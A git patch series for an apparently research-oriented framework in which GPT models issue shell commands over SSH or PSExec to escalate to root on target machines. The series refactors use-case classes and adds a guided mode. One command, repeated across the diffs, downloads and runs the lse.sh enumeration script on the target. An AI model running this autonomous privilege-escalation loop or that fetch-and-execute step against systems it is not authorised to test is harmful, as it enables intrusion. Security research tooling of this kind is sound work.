From fbe6ba7162242fbb2e69d266ce6a95672c57a0c3 Mon Sep 17 00:00:00 2001 From: Andreas Happe Date: Tue, 7 May 2024 15:16:11 +0200 Subject: [PATCH 1/6] chg: move hints.json file-reading into a separate class This should be the first step towards multi-level LLM decision making, e.g., use-cases where we have an outer loop containing e.g. high-level decision making, and an inner loop that e.g. contains a concrete sub-usecase execution. For example: we have an outer loop that can iterate over multiple attack classes, and an inner loop that executes examples for the respective (current) attack class --- usecases/privesc/privesc.py | 74 +++++++++++++++++++++++++++++++------ 1 file changed, 63 insertions(+), 11 deletions(-) diff --git a/usecases/privesc/privesc.py b/usecases/privesc/privesc.py index 539509e..13964f5 100644 --- a/usecases/privesc/privesc.py +++ b/usecases/privesc/privesc.py @@ -12,39 +12,91 @@ from usecases.usecase import use_case, UseCase from usecases.usecase.roundbased import RoundBasedUseCase from utils.cli_history import SlidingCliHistory +from utils.console.console import Console +from utils.db_storage.db_storage import DbStorage +from utils.openai.openai_llm import OpenAIConnection template_dir = pathlib.Path(__file__).parent / "templates" template_next_cmd = Template(filename=str(template_dir / "query_next_command.txt")) template_analyze = Template(filename=str(template_dir / "analyze_cmd.txt")) template_state = Template(filename=str(template_dir / "update_state.txt")) +@use_case("linux_privesc_hintfile", "Linux Privilege Escalation using a hints file") @dataclass -class Privesc(RoundBasedUseCase, UseCase, abc.ABC): - +class PrivescWithHintFile(UseCase, abc.ABC): + conn: SSHConnection = None system: str = '' enable_explanation: bool = False enable_update_state: bool = False disable_history: bool = False hints: str = "" - - _sliding_history: SlidingCliHistory = None - _state: str = "" - _hint: str = None - _capabilities: Dict[str, Capability] = field(default_factory=dict) + + # all of these would typically be set by RoundBasedUseCase :-/ + # but we need them here so that we can pass them on to the inner + # use-case + log_db: DbStorage = None + console: Console = None + llm: OpenAIConnection = None + tag: str = "" + max_turns: int = 10 def init(self): super().init() - def setup(self): + # simple helper that reads the hints file and returns the hint + # for the current machine (test-case) + def read_hint(self): if self.hints != "": try: with open(self.hints, "r") as hint_file: hints = json.load(hint_file) if self.conn.hostname in hints: - self._hint = hints[self.conn.hostname] - self.console.print(f"[bold green]Using the following hint: '{self._hint}'") + return hints[self.conn.hostname] except: self.console.print("[yellow]Was not able to load hint file") + else: + self.console.print("[yellow]calling the hintfile use-case without a hint file?") + return "" + + def run(self): + # read the hint + hint = self.read_hint() + + # call the inner use-case + priv_esc = LinuxPrivesc( + conn=self.conn, # must be set in sub classes + enable_explanation=self.enable_explanation, + disable_history=self.disable_history, + hint=hint, + log_db = self.log_db, + console = self.console, + llm = self.llm, + tag = self.tag, + max_turns = self.max_turns + ) + + priv_esc.init() + priv_esc.run() + +@dataclass +class Privesc(RoundBasedUseCase, UseCase, abc.ABC): + + system: str = '' + enable_explanation: bool = False + enable_update_state: bool = False + disable_history: bool = False + hint: str = "" + + _sliding_history: SlidingCliHistory = None + _state: str = "" + _capabilities: Dict[str, Capability] = field(default_factory=dict) + + def init(self): + super().init() + + def setup(self): + if self.hint != "": + self.console.print(f"[bold green]Using the following hint: '{self.hint}'") if self.disable_history == False: self._sliding_history = SlidingCliHistory(self.llm) @@ -107,7 +159,7 @@ def get_next_command(self): if not self.disable_history: history = self._sliding_history.get_history(self.llm.context_size - llm_util.SAFETY_MARGIN - state_size - template_size) - cmd = self.llm.get_response(template_next_cmd, _capabilities=self._capabilities, history=history, state=self._state, conn=self.conn, system=self.system, update_state=self.enable_update_state, target_user="root", hint=self._hint) + cmd = self.llm.get_response(template_next_cmd, _capabilities=self._capabilities, history=history, state=self._state, conn=self.conn, system=self.system, update_state=self.enable_update_state, target_user="root", hint=self.hint) cmd.result = llm_util.cmd_output_fixer(cmd.result) return cmd From d8791beb2a89fb6907759bba93e82bb8424b7a8c Mon Sep 17 00:00:00 2001 From: Andreas Happe Date: Tue, 7 May 2024 19:06:38 +0200 Subject: [PATCH 2/6] add a configurable timeout to ssh-runcommand --- capabilities/ssh_run_command.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/capabilities/ssh_run_command.py b/capabilities/ssh_run_command.py index 103a5b2..ee7bde1 100644 --- a/capabilities/ssh_run_command.py +++ b/capabilities/ssh_run_command.py @@ -22,7 +22,7 @@ class SSHRunCommand(Capability): def describe(self, name: str = None) -> str: return f"give a command to be executed on the shell and I will respond with the terminal output when running this command on the linux server. The given command must not require user interaction. Only state the to be executed command. The command should be used for enumeration or privilege escalation." - def __call__(self, command: str) -> Tuple[str, bool]: + def __call__(self, command: str, timeout:int=10) -> Tuple[str, bool]: got_root = False sudo_pass = Responder( pattern=r'\[sudo\] password for ' + self.conn.username + ':', @@ -32,7 +32,7 @@ def __call__(self, command: str) -> Tuple[str, bool]: out = StringIO() try: - resp = self.conn.run(command, pty=True, warn=True, out_stream=out, watchers=[sudo_pass], timeout=10) + resp = self.conn.run(command, pty=True, warn=True, out_stream=out, watchers=[sudo_pass], timeout=timeout) except Exception as e: print("TIMEOUT! Could we have become root?") out.seek(0) From 1aae1f067ca5cdbb11cee198af4f1b36fbb1122a Mon Sep 17 00:00:00 2001 From: Andreas Happe Date: Tue, 7 May 2024 19:20:17 +0200 Subject: [PATCH 3/6] return the 'got_root' state at the end of the run --- usecases/usecase/roundbased.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/usecases/usecase/roundbased.py b/usecases/usecase/roundbased.py index 13faa2c..5c1ab0d 100644 --- a/usecases/usecase/roundbased.py +++ b/usecases/usecase/roundbased.py @@ -57,4 +57,5 @@ def run(self): self.log_db.run_was_failure(self._run_id, turn) self.console.print(Panel("[green]maximum turn number reached", title="Run finished")) - self.teardown() \ No newline at end of file + self.teardown() + return self._got_root \ No newline at end of file From 9ac3ba4c2f3cf9a5e91420b04a2f95648fc95fcf Mon Sep 17 00:00:00 2001 From: Andreas Happe Date: Tue, 7 May 2024 19:20:52 +0200 Subject: [PATCH 4/6] add a privesc_guided that first calls an enumeration tool This is a rough prototype that: - inititally downloads and executes an enumeration tool (lse) - executes and caputure its output - use gpt-4-turbo to generate up to 3 attack classes - use gpt-3.5-turbo with up to 20 steps per attack class to generate commands --- usecases/privesc/privesc.py | 63 +++++++++++++++++++ .../privesc/templates/get_hint_from_lse.txt | 7 +++ 2 files changed, 70 insertions(+) create mode 100644 usecases/privesc/templates/get_hint_from_lse.txt diff --git a/usecases/privesc/privesc.py b/usecases/privesc/privesc.py index 13964f5..b6afd62 100644 --- a/usecases/privesc/privesc.py +++ b/usecases/privesc/privesc.py @@ -20,6 +20,7 @@ template_next_cmd = Template(filename=str(template_dir / "query_next_command.txt")) template_analyze = Template(filename=str(template_dir / "analyze_cmd.txt")) template_state = Template(filename=str(template_dir / "update_state.txt")) +template_lse = Template(filename=str(template_dir / "get_hint_from_lse.txt")) @use_case("linux_privesc_hintfile", "Linux Privilege Escalation using a hints file") @dataclass @@ -78,6 +79,68 @@ def run(self): priv_esc.init() priv_esc.run() +@use_case("linux_privesc_guided", "Linux Privilege Escalation using lse.sh for initial guidance") +@dataclass +class PrivescWithLSE(UseCase, abc.ABC): + conn: SSHConnection = None + system: str = '' + enable_explanation: bool = False + enable_update_state: bool = False + disable_history: bool = False + + # all of these would typically be set by RoundBasedUseCase :-/ + # but we need them here so that we can pass them on to the inner + # use-case + log_db: DbStorage = None + console: Console = None + llm: OpenAIConnection = None + tag: str = "" + max_turns: int = 10 + low_llm: OpenAIConnection = None + + def init(self): + super().init() + + # simple helper that uses lse.sh to get hints from the system + def read_hint(self): + + self.console.print("[green]performing initial enumeration with lse.sh") + + run_cmd = "wget -q 'https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh' -O lse.sh;chmod 700 lse.sh; ./lse.sh -c -i -l 0 | grep -v 'nope$' | grep -v 'skip$'" + + result, got_root = SSHRunCommand(conn=self.conn)(run_cmd, timeout=120) + + self.console.print("[yellow]got the output: " + result) + cmd = self.llm.get_response(template_lse, lse_output=result, number=3) + self.console.print("[yellow]got the cmd: " + cmd.result) + + return cmd.result + + def run(self): + # read the hint + hint = self.read_hint() + + for i in hint.splitlines(): + self.console.print("[green]Now using Hint: " + i) + + # call the inner use-case + priv_esc = LinuxPrivesc( + conn=self.conn, # must be set in sub classes + enable_explanation=self.enable_explanation, + disable_history=self.disable_history, + hint=i, + log_db = self.log_db, + console = self.console, + llm = self.low_llm, + tag = self.tag + "_hint_" +i, + max_turns = self.max_turns + ) + + priv_esc.init() + if priv_esc.run(): + # we are root! w00t! + return True + @dataclass class Privesc(RoundBasedUseCase, UseCase, abc.ABC): diff --git a/usecases/privesc/templates/get_hint_from_lse.txt b/usecases/privesc/templates/get_hint_from_lse.txt new file mode 100644 index 0000000..5ea30ad --- /dev/null +++ b/usecases/privesc/templates/get_hint_from_lse.txt @@ -0,0 +1,7 @@ +Create a list of up to ${number} attack classes that you would try on a linux system (to achieve root level privileges) given the following output: + +~~~ bash +${lse_output} +~~~ + +only output the list of attack classes, for each attack class only output a single short sentence. \ No newline at end of file From fbeeec84319a24df8ffe04de0285b73280207ca2 Mon Sep 17 00:00:00 2001 From: Andreas Happe Date: Tue, 7 May 2024 23:28:47 +0200 Subject: [PATCH 5/6] also add *.sqlite to gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index e7cad3d..9b7eff2 100644 --- a/.gitignore +++ b/.gitignore @@ -6,3 +6,4 @@ __pycache__/ .idea/ *.sqlite3 *.sqlite3-jounal +*.sqlite From c19651c7818c34e8e58a3e5f637562afa8c13811 Mon Sep 17 00:00:00 2001 From: Andreas Happe Date: Fri, 10 May 2024 17:13:19 +0200 Subject: [PATCH 6/6] rename packages/python-files Now we have: - usecases/base.py for basic wiring - usecases/common_patterns.py for reusable control loops/pattersn - usecases/privesc/windows.py for all windows-based use-cases - usecases/privesc/linux.py for all linux-based use-cases (migth be splitup further) - usecases/privesc/common.py for shared code within usecases/privesc --- docs/linux_privesc.md | 2 +- usecases/__init__.py | 1 - usecases/{usecase/usecase.py => base.py} | 0 .../roundbased.py => common_patterns.py} | 2 +- usecases/minimal/minimal.py | 4 +- usecases/privesc/__init__.py | 3 +- usecases/privesc/common.py | 124 ++++++++ usecases/privesc/linux.py | 150 ++++++++++ usecases/privesc/privesc.py | 270 ------------------ usecases/privesc/windows.py | 18 ++ usecases/usecase/__init__.py | 1 - usecases/web/simple.py | 4 +- wintermute.py | 2 +- 13 files changed, 301 insertions(+), 280 deletions(-) rename usecases/{usecase/usecase.py => base.py} (100%) rename usecases/{usecase/roundbased.py => common_patterns.py} (97%) create mode 100644 usecases/privesc/common.py create mode 100644 usecases/privesc/linux.py delete mode 100644 usecases/privesc/privesc.py create mode 100644 usecases/privesc/windows.py delete mode 100644 usecases/usecase/__init__.py diff --git a/docs/linux_privesc.md b/docs/linux_privesc.md index cc6199d..6789c39 100644 --- a/docs/linux_privesc.md +++ b/docs/linux_privesc.md @@ -22,7 +22,7 @@ Please note, that the last 3-4 features are slowly migrated directly into the fr This is a simple example run of `wintermute.py` using GPT-4 against a vulnerable VM. More example runs can be seen in [our collection of historic runs](docs/old_runs/old_runs.md). -![Example wintermute run](/docs/old_runs/example_run_gpt4.png) +![Example wintermute run](old_runs/example_run_gpt4.png) Some things to note: diff --git a/usecases/__init__.py b/usecases/__init__.py index d25a03c..c2e94e8 100644 --- a/usecases/__init__.py +++ b/usecases/__init__.py @@ -1,4 +1,3 @@ -from .usecase import * from .privesc import * from .minimal import * from .web import * diff --git a/usecases/usecase/usecase.py b/usecases/base.py similarity index 100% rename from usecases/usecase/usecase.py rename to usecases/base.py diff --git a/usecases/usecase/roundbased.py b/usecases/common_patterns.py similarity index 97% rename from usecases/usecase/roundbased.py rename to usecases/common_patterns.py index 7695eb7..4808482 100644 --- a/usecases/usecase/roundbased.py +++ b/usecases/common_patterns.py @@ -2,7 +2,7 @@ from dataclasses import dataclass from rich.panel import Panel -from usecases.usecase import UseCase +from usecases.base import UseCase from utils import Console, DbStorage from utils.openai.openai_llm import OpenAIConnection diff --git a/usecases/minimal/minimal.py b/usecases/minimal/minimal.py index ea56813..efcc70e 100644 --- a/usecases/minimal/minimal.py +++ b/usecases/minimal/minimal.py @@ -7,8 +7,8 @@ from capabilities import Capability, SSHRunCommand, SSHTestCredential from utils import SSHConnection, llm_util -from usecases.usecase import use_case -from usecases.usecase.roundbased import RoundBasedUseCase +from usecases.base import use_case +from usecases.common_patterns import RoundBasedUseCase from utils.cli_history import SlidingCliHistory template_dir = pathlib.Path(__file__).parent diff --git a/usecases/privesc/__init__.py b/usecases/privesc/__init__.py index 83c371c..02811a2 100644 --- a/usecases/privesc/__init__.py +++ b/usecases/privesc/__init__.py @@ -1 +1,2 @@ -from .privesc import LinuxPrivesc, WindowsPrivesc +from .linux import * +from .windows import * diff --git a/usecases/privesc/common.py b/usecases/privesc/common.py new file mode 100644 index 0000000..26afcdf --- /dev/null +++ b/usecases/privesc/common.py @@ -0,0 +1,124 @@ +import abc +import pathlib +from dataclasses import dataclass, field +from typing import Dict + +from mako.template import Template +from rich.panel import Panel + +from capabilities import Capability +from utils import llm_util, ui +from usecases.base import UseCase +from usecases.common_patterns import RoundBasedUseCase +from utils.cli_history import SlidingCliHistory + +template_dir = pathlib.Path(__file__).parent / "templates" +template_next_cmd = Template(filename=str(template_dir / "query_next_command.txt")) +template_analyze = Template(filename=str(template_dir / "analyze_cmd.txt")) +template_state = Template(filename=str(template_dir / "update_state.txt")) +template_lse = Template(filename=str(template_dir / "get_hint_from_lse.txt")) + +@dataclass +class Privesc(RoundBasedUseCase, UseCase, abc.ABC): + + system: str = '' + enable_explanation: bool = False + enable_update_state: bool = False + disable_history: bool = False + hint: str = "" + + _sliding_history: SlidingCliHistory = None + _state: str = "" + _capabilities: Dict[str, Capability] = field(default_factory=dict) + + def init(self): + super().init() + + def setup(self): + if self.hint != "": + self.console.print(f"[bold green]Using the following hint: '{self.hint}'") + + if self.disable_history == False: + self._sliding_history = SlidingCliHistory(self.llm) + + def perform_round(self, turn): + got_root : bool = False + + with self.console.status("[bold green]Asking LLM for a new command..."): + answer = self.get_next_command() + cmd = answer.result + + with self.console.status("[bold green]Executing that command..."): + if answer.result.startswith("test_credential"): + result, got_root = self._capabilities["test_credential"](cmd) + else: + self.console.print(Panel(answer.result, title="[bold cyan]Got command from LLM:")) + result, got_root = self._capabilities["run_command"](cmd) + + # log and output the command and its result + self.log_db.add_log_query(self._run_id, turn, cmd, result, answer) + if self._sliding_history: + self._sliding_history.add_command(cmd, result) + self.console.print(Panel(result, title=f"[bold cyan]{cmd}")) + + # analyze the result.. + if self.enable_explanation: + with self.console.status("[bold green]Analyze its result..."): + answer = self.analyze_result(cmd, result) + self.log_db.add_log_analyze_response(self._run_id, turn, cmd, answer.result, answer) + + # .. and let our local model update its state + if self.enable_update_state: + # this must happen before the table output as we might include the + # status processing time in the table.. + with self.console.status("[bold green]Updating fact list.."): + state = self.update_state(cmd, result) + self.log_db.add_log_update_state(self._run_id, turn, "", state.result, state) + + # Output Round Data.. + self.console.print(ui.get_history_table(self.enable_explanation, self.enable_update_state, self._run_id, self.log_db, turn)) + + # .. and output the updated state + if self.enable_update_state: + self.console.print(Panel(self._state, title="What does the LLM Know about the system?")) + + # if we got root, we can stop the loop + return got_root + + def get_state_size(self): + if self.enable_update_state: + return self.llm.count_tokens(self._state) + else: + return 0 + + def get_next_command(self): + state_size = self.get_state_size() + template_size = self.llm.count_tokens(template_next_cmd.source) + + history = '' + if not self.disable_history: + history = self._sliding_history.get_history(self.llm.context_size - llm_util.SAFETY_MARGIN - state_size - template_size) + + cmd = self.llm.get_response(template_next_cmd, _capabilities=self._capabilities, history=history, state=self._state, conn=self.conn, system=self.system, update_state=self.enable_update_state, target_user="root", hint=self.hint) + cmd.result = llm_util.cmd_output_fixer(cmd.result) + return cmd + + def analyze_result(self, cmd, result): + state_size = self.get_state_size() + target_size = self.llm.context_size - llm_util.SAFETY_MARGIN - state_size + + # ugly, but cut down result to fit context size + result = llm_util.trim_result_front(self.llm, target_size, result) + return self.llm.get_response(template_analyze, cmd=cmd, resp=result, facts=self._state) + + def update_state(self, cmd, result): + # ugly, but cut down result to fit context size + # don't do this linearly as this can take too long + ctx = self.llm.context_size + state_size = self.get_state_size() + target_size = ctx - llm_util.SAFETY_MARGIN - state_size + result = llm_util.trim_result_front(self.llm, target_size, result) + + result = self.llm.get_response(template_state, cmd=cmd, resp=result, facts=self._state) + self._state = result.result + return result \ No newline at end of file diff --git a/usecases/privesc/linux.py b/usecases/privesc/linux.py new file mode 100644 index 0000000..74912b0 --- /dev/null +++ b/usecases/privesc/linux.py @@ -0,0 +1,150 @@ +import abc +import json +import pathlib +from dataclasses import dataclass + +from mako.template import Template + +from capabilities import SSHRunCommand, SSHTestCredential +from usecases.privesc.common import Privesc +from utils import SSHConnection +from usecases.base import use_case, UseCase +from utils.console.console import Console +from utils.db_storage.db_storage import DbStorage +from utils.openai.openai_llm import OpenAIConnection + +template_dir = pathlib.Path(__file__).parent / "templates" +template_next_cmd = Template(filename=str(template_dir / "query_next_command.txt")) +template_analyze = Template(filename=str(template_dir / "analyze_cmd.txt")) +template_state = Template(filename=str(template_dir / "update_state.txt")) +template_lse = Template(filename=str(template_dir / "get_hint_from_lse.txt")) + +@use_case("linux_privesc_hintfile", "Linux Privilege Escalation using a hints file") +@dataclass +class PrivescWithHintFile(UseCase, abc.ABC): + conn: SSHConnection = None + system: str = '' + enable_explanation: bool = False + enable_update_state: bool = False + disable_history: bool = False + hints: str = "" + + # all of these would typically be set by RoundBasedUseCase :-/ + # but we need them here so that we can pass them on to the inner + # use-case + log_db: DbStorage = None + console: Console = None + llm: OpenAIConnection = None + tag: str = "" + max_turns: int = 10 + + def init(self): + super().init() + + # simple helper that reads the hints file and returns the hint + # for the current machine (test-case) + def read_hint(self): + if self.hints != "": + try: + with open(self.hints, "r") as hint_file: + hints = json.load(hint_file) + if self.conn.hostname in hints: + return hints[self.conn.hostname] + except: + self.console.print("[yellow]Was not able to load hint file") + else: + self.console.print("[yellow]calling the hintfile use-case without a hint file?") + return "" + + def run(self): + # read the hint + hint = self.read_hint() + + # call the inner use-case + priv_esc = LinuxPrivesc( + conn=self.conn, # must be set in sub classes + enable_explanation=self.enable_explanation, + disable_history=self.disable_history, + hint=hint, + log_db = self.log_db, + console = self.console, + llm = self.llm, + tag = self.tag, + max_turns = self.max_turns + ) + + priv_esc.init() + priv_esc.run() + +@use_case("linux_privesc_guided", "Linux Privilege Escalation using lse.sh for initial guidance") +@dataclass +class PrivescWithLSE(UseCase, abc.ABC): + conn: SSHConnection = None + system: str = '' + enable_explanation: bool = False + enable_update_state: bool = False + disable_history: bool = False + + # all of these would typically be set by RoundBasedUseCase :-/ + # but we need them here so that we can pass them on to the inner + # use-case + log_db: DbStorage = None + console: Console = None + llm: OpenAIConnection = None + tag: str = "" + max_turns: int = 10 + low_llm: OpenAIConnection = None + + def init(self): + super().init() + + # simple helper that uses lse.sh to get hints from the system + def read_hint(self): + + self.console.print("[green]performing initial enumeration with lse.sh") + + run_cmd = "wget -q 'https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh' -O lse.sh;chmod 700 lse.sh; ./lse.sh -c -i -l 0 | grep -v 'nope$' | grep -v 'skip$'" + + result, got_root = SSHRunCommand(conn=self.conn)(run_cmd, timeout=120) + + self.console.print("[yellow]got the output: " + result) + cmd = self.llm.get_response(template_lse, lse_output=result, number=3) + self.console.print("[yellow]got the cmd: " + cmd.result) + + return cmd.result + + def run(self): + # read the hint + hint = self.read_hint() + + for i in hint.splitlines(): + self.console.print("[green]Now using Hint: " + i) + + # call the inner use-case + priv_esc = LinuxPrivesc( + conn=self.conn, # must be set in sub classes + enable_explanation=self.enable_explanation, + disable_history=self.disable_history, + hint=i, + log_db = self.log_db, + console = self.console, + llm = self.low_llm, + tag = self.tag + "_hint_" +i, + max_turns = self.max_turns + ) + + priv_esc.init() + if priv_esc.run(): + # we are root! w00t! + return True + +@use_case("linux_privesc", "Linux Privilege Escalation") +@dataclass +class LinuxPrivesc(Privesc): + conn: SSHConnection = None + system: str = "linux" + + def init(self): + super().init() + self._capabilities["run_command"] = SSHRunCommand(conn=self.conn) + self._capabilities["test_credential"] = SSHTestCredential(conn=self.conn) \ No newline at end of file diff --git a/usecases/privesc/privesc.py b/usecases/privesc/privesc.py deleted file mode 100644 index b6afd62..0000000 --- a/usecases/privesc/privesc.py +++ /dev/null @@ -1,270 +0,0 @@ -import abc -import json -import pathlib -from dataclasses import dataclass, field -from typing import Dict - -from mako.template import Template -from rich.panel import Panel - -from capabilities import Capability, SSHRunCommand, SSHTestCredential, PSExecRunCommand, PSExecTestCredential -from utils import SSHConnection, PSExecConnection, llm_util, ui -from usecases.usecase import use_case, UseCase -from usecases.usecase.roundbased import RoundBasedUseCase -from utils.cli_history import SlidingCliHistory -from utils.console.console import Console -from utils.db_storage.db_storage import DbStorage -from utils.openai.openai_llm import OpenAIConnection - -template_dir = pathlib.Path(__file__).parent / "templates" -template_next_cmd = Template(filename=str(template_dir / "query_next_command.txt")) -template_analyze = Template(filename=str(template_dir / "analyze_cmd.txt")) -template_state = Template(filename=str(template_dir / "update_state.txt")) -template_lse = Template(filename=str(template_dir / "get_hint_from_lse.txt")) - -@use_case("linux_privesc_hintfile", "Linux Privilege Escalation using a hints file") -@dataclass -class PrivescWithHintFile(UseCase, abc.ABC): - conn: SSHConnection = None - system: str = '' - enable_explanation: bool = False - enable_update_state: bool = False - disable_history: bool = False - hints: str = "" - - # all of these would typically be set by RoundBasedUseCase :-/ - # but we need them here so that we can pass them on to the inner - # use-case - log_db: DbStorage = None - console: Console = None - llm: OpenAIConnection = None - tag: str = "" - max_turns: int = 10 - - def init(self): - super().init() - - # simple helper that reads the hints file and returns the hint - # for the current machine (test-case) - def read_hint(self): - if self.hints != "": - try: - with open(self.hints, "r") as hint_file: - hints = json.load(hint_file) - if self.conn.hostname in hints: - return hints[self.conn.hostname] - except: - self.console.print("[yellow]Was not able to load hint file") - else: - self.console.print("[yellow]calling the hintfile use-case without a hint file?") - return "" - - def run(self): - # read the hint - hint = self.read_hint() - - # call the inner use-case - priv_esc = LinuxPrivesc( - conn=self.conn, # must be set in sub classes - enable_explanation=self.enable_explanation, - disable_history=self.disable_history, - hint=hint, - log_db = self.log_db, - console = self.console, - llm = self.llm, - tag = self.tag, - max_turns = self.max_turns - ) - - priv_esc.init() - priv_esc.run() - -@use_case("linux_privesc_guided", "Linux Privilege Escalation using lse.sh for initial guidance") -@dataclass -class PrivescWithLSE(UseCase, abc.ABC): - conn: SSHConnection = None - system: str = '' - enable_explanation: bool = False - enable_update_state: bool = False - disable_history: bool = False - - # all of these would typically be set by RoundBasedUseCase :-/ - # but we need them here so that we can pass them on to the inner - # use-case - log_db: DbStorage = None - console: Console = None - llm: OpenAIConnection = None - tag: str = "" - max_turns: int = 10 - low_llm: OpenAIConnection = None - - def init(self): - super().init() - - # simple helper that uses lse.sh to get hints from the system - def read_hint(self): - - self.console.print("[green]performing initial enumeration with lse.sh") - - run_cmd = "wget -q 'https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh' -O lse.sh;chmod 700 lse.sh; ./lse.sh -c -i -l 0 | grep -v 'nope$' | grep -v 'skip$'" - - result, got_root = SSHRunCommand(conn=self.conn)(run_cmd, timeout=120) - - self.console.print("[yellow]got the output: " + result) - cmd = self.llm.get_response(template_lse, lse_output=result, number=3) - self.console.print("[yellow]got the cmd: " + cmd.result) - - return cmd.result - - def run(self): - # read the hint - hint = self.read_hint() - - for i in hint.splitlines(): - self.console.print("[green]Now using Hint: " + i) - - # call the inner use-case - priv_esc = LinuxPrivesc( - conn=self.conn, # must be set in sub classes - enable_explanation=self.enable_explanation, - disable_history=self.disable_history, - hint=i, - log_db = self.log_db, - console = self.console, - llm = self.low_llm, - tag = self.tag + "_hint_" +i, - max_turns = self.max_turns - ) - - priv_esc.init() - if priv_esc.run(): - # we are root! w00t! - return True - -@dataclass -class Privesc(RoundBasedUseCase, UseCase, abc.ABC): - - system: str = '' - enable_explanation: bool = False - enable_update_state: bool = False - disable_history: bool = False - hint: str = "" - - _sliding_history: SlidingCliHistory = None - _state: str = "" - _capabilities: Dict[str, Capability] = field(default_factory=dict) - - def init(self): - super().init() - - def setup(self): - if self.hint != "": - self.console.print(f"[bold green]Using the following hint: '{self.hint}'") - - if self.disable_history == False: - self._sliding_history = SlidingCliHistory(self.llm) - - def perform_round(self, turn): - got_root : bool = False - - with self.console.status("[bold green]Asking LLM for a new command..."): - answer = self.get_next_command() - cmd = answer.result - - with self.console.status("[bold green]Executing that command..."): - if answer.result.startswith("test_credential"): - result, got_root = self._capabilities["test_credential"](cmd) - else: - self.console.print(Panel(answer.result, title="[bold cyan]Got command from LLM:")) - result, got_root = self._capabilities["run_command"](cmd) - - # log and output the command and its result - self.log_db.add_log_query(self._run_id, turn, cmd, result, answer) - if self._sliding_history: - self._sliding_history.add_command(cmd, result) - self.console.print(Panel(result, title=f"[bold cyan]{cmd}")) - - # analyze the result.. - if self.enable_explanation: - with self.console.status("[bold green]Analyze its result..."): - answer = self.analyze_result(cmd, result) - self.log_db.add_log_analyze_response(self._run_id, turn, cmd, answer.result, answer) - - # .. and let our local model update its state - if self.enable_update_state: - # this must happen before the table output as we might include the - # status processing time in the table.. - with self.console.status("[bold green]Updating fact list.."): - state = self.update_state(cmd, result) - self.log_db.add_log_update_state(self._run_id, turn, "", state.result, state) - - # Output Round Data.. - self.console.print(ui.get_history_table(self.enable_explanation, self.enable_update_state, self._run_id, self.log_db, turn)) - - # .. and output the updated state - if self.enable_update_state: - self.console.print(Panel(self._state, title="What does the LLM Know about the system?")) - - # if we got root, we can stop the loop - return got_root - - def get_state_size(self): - if self.enable_update_state: - return self.llm.count_tokens(self._state) - else: - return 0 - - def get_next_command(self): - state_size = self.get_state_size() - template_size = self.llm.count_tokens(template_next_cmd.source) - - history = '' - if not self.disable_history: - history = self._sliding_history.get_history(self.llm.context_size - llm_util.SAFETY_MARGIN - state_size - template_size) - - cmd = self.llm.get_response(template_next_cmd, _capabilities=self._capabilities, history=history, state=self._state, conn=self.conn, system=self.system, update_state=self.enable_update_state, target_user="root", hint=self.hint) - cmd.result = llm_util.cmd_output_fixer(cmd.result) - return cmd - - def analyze_result(self, cmd, result): - state_size = self.get_state_size() - target_size = self.llm.context_size - llm_util.SAFETY_MARGIN - state_size - - # ugly, but cut down result to fit context size - result = llm_util.trim_result_front(self.llm, target_size, result) - return self.llm.get_response(template_analyze, cmd=cmd, resp=result, facts=self._state) - - def update_state(self, cmd, result): - # ugly, but cut down result to fit context size - # don't do this linearly as this can take too long - ctx = self.llm.context_size - state_size = self.get_state_size() - target_size = ctx - llm_util.SAFETY_MARGIN - state_size - result = llm_util.trim_result_front(self.llm, target_size, result) - - result = self.llm.get_response(template_state, cmd=cmd, resp=result, facts=self._state) - self._state = result.result - return result - -@use_case("linux_privesc", "Linux Privilege Escalation") -@dataclass -class LinuxPrivesc(Privesc): - conn: SSHConnection = None - system: str = "linux" - - def init(self): - super().init() - self._capabilities["run_command"] = SSHRunCommand(conn=self.conn) - self._capabilities["test_credential"] = SSHTestCredential(conn=self.conn) - - -@use_case("windows_privesc", "Windows Privilege Escalation") -@dataclass -class WindowsPrivesc(Privesc): - conn: PSExecConnection = None - system: str = "Windows" - - def init(self): - super().init() - self._capabilities["run_command"] = PSExecRunCommand(conn=self.conn) - self._capabilities["test_credential"] = PSExecTestCredential(conn=self.conn) diff --git a/usecases/privesc/windows.py b/usecases/privesc/windows.py new file mode 100644 index 0000000..7ce02f0 --- /dev/null +++ b/usecases/privesc/windows.py @@ -0,0 +1,18 @@ +from dataclasses import dataclass +from capabilities.psexec_run_command import PSExecRunCommand +from capabilities.psexec_test_credential import PSExecTestCredential +from usecases.base import use_case +from usecases.privesc.common import Privesc +from utils.psexec.psexec import PSExecConnection + + +@use_case("windows_privesc", "Windows Privilege Escalation") +@dataclass +class WindowsPrivesc(Privesc): + conn: PSExecConnection = None + system: str = "Windows" + + def init(self): + super().init() + self._capabilities["run_command"] = PSExecRunCommand(conn=self.conn) + self._capabilities["test_credential"] = PSExecTestCredential(conn=self.conn) \ No newline at end of file diff --git a/usecases/usecase/__init__.py b/usecases/usecase/__init__.py deleted file mode 100644 index 5ddeafa..0000000 --- a/usecases/usecase/__init__.py +++ /dev/null @@ -1 +0,0 @@ -from .usecase import use_case, use_cases, UseCase diff --git a/usecases/web/simple.py b/usecases/web/simple.py index 1ec6b77..c44db10 100644 --- a/usecases/web/simple.py +++ b/usecases/web/simple.py @@ -12,8 +12,8 @@ from capabilities.record_note import RecordNote from capabilities.submit_flag import SubmitFlag from utils import LLMResult, tool_message -from usecases.usecase import use_case -from usecases.usecase.roundbased import RoundBasedUseCase +from usecases.base import use_case +from usecases.common_patterns import RoundBasedUseCase from utils.configurable import parameter from utils.openai.openai_lib import OpenAILib diff --git a/wintermute.py b/wintermute.py index d3e1aac..b0e3cb6 100644 --- a/wintermute.py +++ b/wintermute.py @@ -1,7 +1,7 @@ import argparse import sys -from usecases import use_cases +from usecases.base import use_cases def main():